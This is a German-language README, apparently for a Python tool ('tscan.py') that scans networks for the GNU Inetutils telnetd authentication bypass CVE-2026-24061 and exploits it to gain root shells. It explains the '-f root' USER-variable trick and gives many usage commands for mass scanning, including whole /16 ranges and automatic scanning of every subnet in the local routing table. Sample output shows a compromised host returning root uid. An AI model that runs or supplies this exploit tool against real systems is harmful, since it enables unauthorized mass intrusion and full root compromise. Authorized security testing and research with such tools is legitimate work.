
Python-basierter Scanner, der die CVE-2026-24061 telnetd-Authentifizierungsumgehung erkennt und ausnutzt und so Root-Shell-Zugriff auf verwundbare GNU-Inetutils-Dienste ermöglicht.
Ein Python-basierter Scanner zur Erkennung und Ausnutzung der Schwachstelle CVE-2026-24061 in GNU-Inetutils-telnetd-Diensten. Dieses Tool scannt IP-Adressen oder Netzwerke nach verwundbaren telnetd-Diensten, die eine Authentifizierungsumgehung ermöglichen, die zu Root-Shell-Zugriff führt.
DIESE SOFTWARE WIRD AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.
Diese Anwendung wurde ausschließlich zu Bildungszwecken entwickelt, um Sicherheitslücken zu demonstrieren und bei autorisierten Sicherheitstests und Forschungsarbeiten zu helfen.
DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE GEWÄHRLEISTUNG, AUSDRÜCKLICH ODER STILLSCHWEIGEND, BEREITGESTELLT, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER. DIE AUTOREN UND MITWIRKENDEN GARANTIEREN NICHT, DASS DIE SOFTWARE FEHLERFREI, SICHER ODER FUNKTIONSFÄHIG IST. Die Software kann Fehler, Bugs oder andere Defekte enthalten.
DIE GESAMTE VERANTWORTUNG UND HAFTUNG FÜR DIE NUTZUNG DIESER SOFTWARE LIEGT VOLLSTÄNDIG BEIM BENUTZER. Die Autoren, Mitwirkenden und Vertreiber dieser Software haften nicht für Schäden, Verluste oder rechtliche Konsequenzen, die aus der Nutzung, dem Missbrauch oder der Unfähigkeit zur Nutzung dieser Software entstehen.
Dieses Tool darf NUR auf Systemen verwendet werden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und kann zu strafrechtlicher Verfolgung führen.
Die Autoren garantieren NICHT:
Durch die Nutzung dieser Software bestätigen Sie, dass Sie diese Bedingungen gelesen, verstanden haben und ihnen zustimmen. Wenn Sie nicht zustimmen, verwenden Sie diese Software nicht.
Entwickelt von: Cuma KURT
E-Mail: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: GNU-Inetutils-telnetd bis einschließlich Version 2.7 ermöglicht eine Remote-Authentifizierungsumgehung über einen -f root-Wert für die Umgebungsvariable USER.
CVSS-Score: 9.8 (Kritisch)
Referenz: NVD CVE-2026-24061
telnet-Client (normalerweise vorinstalliert auf Linux/macOS)pip3 install -r requirements.txt
Hinweis: Die meisten Abhängigkeiten sind Teil der Python-Standardbibliothek. Das Tool funktioniert sofort mit Python 3.6+.
# Einzelne IP-Adresse scannen
python3 tscan.py 192.168.1.1
# CIDR-Netzwerk scannen
python3 tscan.py 192.168.1.0/24
# Mit benutzerdefiniertem Port scannen
python3 tscan.py -p 2323 192.168.1.1
# Ziele aus einer Datei scannen
python3 tscan.py targets.txt
# Mehrere IP-Adressen scannen
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# Mehrere CIDR-Netzwerke scannen
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# Thread-Anzahl für schnelleres Scannen erhöhen (100 Threads)
python3 tscan.py -t 100 192.168.1.0/24
# Timeout für langsame Netzwerke erhöhen
python3 tscan.py --timeout 10 192.168.1.0/24
# Beides für große Netzwerk-Scans kombinieren
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# Alle Subnetze aus der System-Routing-Tabelle automatisch erkennen und scannen
python3 tscan.py --auto
# oder Kurzform:
python3 tscan.py -a
# Automatische Erkennung mit benutzerdefiniertem Port
python3 tscan.py --auto -p 2323
# oder:
python3 tscan.py -a -p 2323
# Automatische Erkennung mit hoher Thread-Anzahl
python3 tscan.py --auto -t 200
# oder:
python3 tscan.py -a -t 200
Hinweis: Der --auto-Modus liest die System-Routing-Tabelle mit dem Befehl ip route list oder route -n und scannt automatisch alle erkannten Subnetze.
# Beispiel 1: Schneller Scan des lokalen Netzwerks
python3 tscan.py 192.168.1.0/24
# Beispiel 2: Schneller Scan mit hoher Parallelität
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# Beispiel 3: Nicht standardmäßigen Telnet-Port scannen
python3 tscan.py -p 2323 192.168.1.0/24
# Beispiel 4: Alle lokalen Netzwerk-Subnetze automatisch erkennen und scannen
python3 tscan.py --auto
# oder:
python3 tscan.py -a
# Beispiel 5: Automatische Erkennung mit benutzerdefinierten Einstellungen
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# oder:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
positional arguments:
targets IP-Adresse(n), CIDR-Netzwerk(e) oder Dateipfad(e) mit Zielen
options:
-h, --help Diese Hilfemeldung anzeigen und beenden
-p, --port PORT Zu scannender Telnet-Port (Standard: 23)
-t, --threads THREADS Anzahl der gleichzeitigen Threads (Standard: 50)
--timeout TIMEOUT Verbindungs-Timeout in Sekunden (Standard: 5)
-v, --verbose Ausführliche Ausgabe
-a, --auto Alle Subnetze aus der System-Routing-Tabelle automatisch erkennen und scannen (route -n oder ip route list)
Erstellen Sie eine Textdatei mit einem Ziel pro Zeile:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
Zeilen, die mit # beginnen, werden als Kommentare behandelt und ignoriert.
Das Tool bietet:
Echtzeit-Fortschritt: Zeigt Ergebnisse, sobald sie entdeckt werden
[!] - Verwundbarer Host[~] - Port offen, aber nicht verwundbarZusammenfassungsbericht: Enthält:
[*] Starte Scan von 256 Ziel(en)...
[*] Port: 23, Threads: 50, Timeout: 5s
[*] Fortschritt: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Offen: 2 | Verwundbar: 1
[!] 192.168.1.100:23 - VERWUNDBAR
[*] Fortschritt: [████████████████████████████████████] 100.0% (256/256) | Offen: 3 | Verwundbar: 1
[+] Scan abgeschlossen: 256/256 Ziele gescannt
======================================================================
Zusammenfassung der Scan-Ergebnisse
======================================================================
Telnet-Dienste gefunden: 3
Verwundbare Hosts: 1
[!] VERWUNDBARE HOSTS:
● 192.168.1.100:23
Ausgabe: uid=0(root) gid=0(root) groups=0(root)...